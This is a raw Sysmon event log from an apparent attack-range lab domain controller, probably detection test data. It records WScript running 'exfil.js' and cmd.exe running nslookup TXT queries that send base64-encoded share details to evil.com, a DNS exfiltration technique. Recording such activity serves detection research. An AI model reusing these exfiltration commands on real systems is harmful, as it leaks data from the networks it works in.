14:16:20.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.715{2E1864BB-17B4-629A-363F-000000005F02}2792C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-343F-000000005F02}5064C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeab.tmp 2>&1 10341000x8000000000000000197428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.690{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-353F-000000005F02}5968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.690{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-353F-000000005F02}5968C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.690{2E1864BB-17B4-629A-353F-000000005F02}59687632C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-343F-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.674{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-353F-000000005F02}5968C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.658{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.658{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.658{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.658{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.658{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-343F-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.658{2E1864BB-17A1-629A-783D-000000005F02}55521300C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-343F-000000005F02}5064C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.672{2E1864BB-17B4-629A-343F-000000005F02}5064C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeab.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.658{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldtsprr.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.627{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.627{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.627{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.627{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-17B4-629A-313F-000000005F02}70527292C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}7452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-333F-000000005F02}7452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-17B4-629A-303F-000000005F02}77005088C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-333F-000000005F02}7452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.617{2E1864BB-17B4-629A-333F-000000005F02}7452C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-303F-000000005F02}7700C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldtsprr.tmp 2>&1 22542200x8000000000000000197408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.057{00000000-0000-0000-0000-000000000000}3396evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.998{00000000-0000-0000-0000-000000000000}8072evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.863{00000000-0000-0000-0000-000000000000}2900evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.763{00000000-0000-0000-0000-000000000000}3644evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.405{00000000-0000-0000-0000-000000000000}3736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000197403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.329{00000000-0000-0000-0000-000000000000}5392evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000197402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-323F-000000005F02}6016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-323F-000000005F02}6016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.611{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17B4-629A-323F-000000005F02}6016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program 